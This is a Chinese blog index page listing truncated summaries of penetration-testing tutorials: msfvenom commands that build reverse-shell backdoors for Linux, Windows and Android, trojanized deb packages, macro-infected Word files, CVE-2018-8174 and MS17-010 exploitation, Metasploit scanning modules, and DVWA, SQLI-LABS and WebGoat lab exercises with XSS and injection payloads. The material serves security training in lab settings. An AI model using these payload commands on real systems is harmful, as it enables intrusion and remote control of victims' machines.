摘要:
实战-制作 Linux 恶意软件获取 shell1、使用 msfvenom 生成 linux 可执行文件 root@kali:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168. 阅读全文
posted @ 2025-07-16 15:11
长温不喜风云
阅读(19)
评论(0)
推荐(0)
摘要:
实战-制作恶意 deb 软件包来触发后门制作恶意软件包使用--download-only 方式下载软件包不进行安装 root@ kali:~# apt --download-only install freesweep 将软件包移动到 root 目录 root@ kali:~# mv /var/ca 阅读全文
posted @ 2025-07-16 15:11
长温不喜风云
阅读(24)
评论(0)
推荐(0)
摘要:
基于 java 环境的漏洞利用获取 shell搭建 java 环境 第一步我们先安装 java 环境上传 jre 到 win7 或 xp 操作系统实战-使用 java 模块 getshell msf6 > use exploit/multi/browser/java_jre17_driver_man 阅读全文
posted @ 2025-07-16 15:11
长温不喜风云
阅读(16)
评论(0)
推荐(0)
摘要:
利用宏感染 word 文档获取 shell首先将 cn_office_professional_plus_2007_dvd_X12-38713.rar 上传到 win7 虚拟上,解压后,安装一下 office。office 的激活码: DBXYD-TF477-46YM4-W74MH-6YDQ8roo 阅读全文
posted @ 2025-07-16 15:11
长温不喜风云
阅读(11)
评论(0)
推荐(0)
摘要:
利用 0DAY 漏洞 CVE-2018-8174 获取 shell1、安装 CVE-2018-8174_EXP 从 github 上克隆 CVE-2018-8174 的 EXP 到 Kali https://github.com/Yt1g3r/CVE-2018-8174_EXP2、生成恶意 html 阅读全文
posted @ 2025-07-16 15:11
长温不喜风云
阅读(44)
评论(0)
推荐(0)
摘要:
安卓客户端渗透同样的我们可以通过 MSF 生成一个 apk 的后门应用。 root@ kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.185.252 LPORT=4444 R > xuegod.apk 下载至安卓手机 阅读全文
posted @ 2025-07-16 15:11
长温不喜风云
阅读(45)
评论(0)
推荐(0)
摘要:
制作 Windows 恶意软件获取 shell1.生成西瓜影音.exe 后门程序使用一个编码器 root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.185.2 阅读全文
posted @ 2025-07-16 15:02
长温不喜风云
阅读(27)
评论(0)
推荐(0)
摘要:
实战-使用 msf 渗透攻击 Win7 主机并远程执行命令 通过 msf 模块获取 Win7 主机远程 shell 先扫描目标是否存在 ms17-010 漏洞 msf6 > search ms17-010 使用 use 命令选中这个模块 msf6 > use auxiliary/scanner/sm 阅读全文
posted @ 2025-07-16 14:57
长温不喜风云
阅读(56)
评论(0)
推荐(0)
摘要:
基于 FTP 协议收集信息1.查看ftp服务的版本信息 加载 ftp 服务版本扫描模块 msf6 > use auxiliary/scanner/ftp/ftp_version查看设置参数 msf6 auxiliary(scanner/ftp/ftp_version) > show options设 阅读全文
posted @ 2025-07-16 13:07
长温不喜风云
阅读(28)
评论(0)
推荐(0)
摘要:
基于 SMB 协议收集信息1.使用 smb_version 基于 SMB 协议扫描版本号msf6 > use auxiliary/scanner/smb/smb_version msf6 auxiliary(scanner/smb/smb_version) > show options msf6 a 阅读全文
posted @ 2025-07-16 13:07
长温不喜风云
阅读(19)
评论(0)
推荐(0)
摘要:
基于 SNMP 协议收集主机信息msf6 > use auxiliary/scanner/snmp/snmp_enum msf6 auxiliary(scanner/snmp/snmp_enum) > show options msf6 auxiliary(scanner/snmp/snmp_enu 阅读全文
posted @ 2025-07-16 13:07
长温不喜风云
阅读(14)
评论(0)
推荐(0)
摘要:
基于 SSH 协议收集信息1.查看 ssh 服务的版本信息msf6 > use auxiliary/scanner/ssh/ssh_version msf6 auxiliary(scanner/ssh/ssh_version) > show options msf6 auxiliary(scanne 阅读全文
posted @ 2025-07-16 13:07
长温不喜风云
阅读(9)
评论(0)
推荐(0)
摘要:
基于 tcp 协议收集主机信息1.使用 Metasploit 中的 nmap 和 arp_sweep 收集主机信息msf6 > db_nmap -sV 192.168.1.1 ARP 扫描 msf6 > use auxiliary/scanner/discovery/arp_sweep 查看一下模块 阅读全文
posted @ 2025-07-16 13:07
长温不喜风云
阅读(12)
评论(0)
推荐(0)
摘要:
实战-使用 msf 扫描靶机上 mysql 服务的空密码 实战-使用 msf 扫描靶机上 mysql 服务的空密码启动一台 Metasploitable2-Linux 靶机网络模式为桥接 IP:192.168.215.67登录 Metasploitable2-Linux 系统用户名 root,密码: 阅读全文
posted @ 2025-07-16 13:06
长温不喜风云
阅读(31)
评论(0)
推荐(0)
摘要:
SQLI-LIBS首先进入32关:我们尝试测试一下注入点,输入语句:?id=1\页面回显:可以看到我们输入的语句被变成了 ?id=1\\ 说明我们输入的反斜杠被后台注释掉了。我们输入单引号测试一下:?id=1'页面回显:可以看到我们输入的语句被后台变成了 ?id=1\' 我们输入的单引号同样被后台注 阅读全文
posted @ 2025-07-16 12:40
长温不喜风云
阅读(38)
评论(0)
推荐(0)
摘要:
DVWASQL InjectionLOW1、输入User ID显示对应的name,并且输入的ID值在URL栏中2、猜测 可能通过ID值带入数据库中进行查询,判断是否存在注入http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1 and 1=2 &Submit 阅读全文
posted @ 2025-07-16 12:31
长温不喜风云
阅读(19)
评论(0)
推荐(0)
摘要:
DVWAFile UploadLOW首先我们准备一个一句话木马文件123.php<?php phpinfo();?>1、访问页面有一个文件上传点2、直接上传123.php3、访问文件Medium1、直接上传123.php文件2、修改123.php文件名为456.jpg,上传时通过burp抓取上传请求 阅读全文
posted @ 2025-07-16 12:01
长温不喜风云
阅读(12)
评论(0)
推荐(0)
摘要:
Webgoat第1题输入tom然后登入然后更改编辑文件更改street内容为<script>alert(/hyh/)</script>然后点击EditProfile第5题用tom登录下一步点检查输入tom然后在回到检查页面输入<script>alert(/hyh/)</script>DVWAXSS( 阅读全文
posted @ 2025-07-16 12:01
长温不喜风云
阅读(22)
评论(0)
推荐(0)
摘要:
Webgoat基于角色的访问控制(LAB: Role Based Access Control)技术概念:一个基于角色的访问控制通常包括两个部分:角色权限管理和角色分配。一个被破坏的基于角色的访问控制方案,可能允许用户以没有分配他的角色或以某种方式获得的未经授权的角色进行访问。操作方法:Stage1 阅读全文
posted @ 2025-07-16 12:01
长温不喜风云
阅读(75)
评论(0)
推荐(0)
摘要:
Webgoat简单介绍:计算机程序一般都会使用到一些内存,这些内存或是程序内部使用,或是存放用户的输入数据,这样的内存一般称作缓冲区。溢出是指盛放的东西超出容器容量而溢出来了,在计算机程序中,就是数据使用到了被分配内存空间之外的内存空间。而缓冲区溢出,简单的说就是计算机对接收的输入数据没有进行有效的 阅读全文
posted @ 2025-07-16 12:01
长温不喜风云
阅读(28)
评论(0)
推荐(0)
摘要:
DVWA CSRF LOW 网站本意是想让我们在网站里面修改密码 但是能够主要到当我们更改密码成功后url栏的参数是这样的 http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Cha 阅读全文
posted @ 2025-07-16 12:00
长温不喜风云
阅读(11)
评论(0)
推荐(0)

浙公网安备 33010602011771号